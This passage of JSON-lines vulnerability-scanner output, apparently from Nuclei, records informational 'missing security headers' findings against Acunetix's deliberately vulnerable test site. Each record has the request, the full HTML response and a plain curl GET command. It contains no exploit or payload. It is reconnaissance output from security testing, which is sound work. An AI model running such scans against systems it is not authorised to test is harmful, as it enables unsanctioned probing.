class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506707985Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506734384Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506759417Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.668455625Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 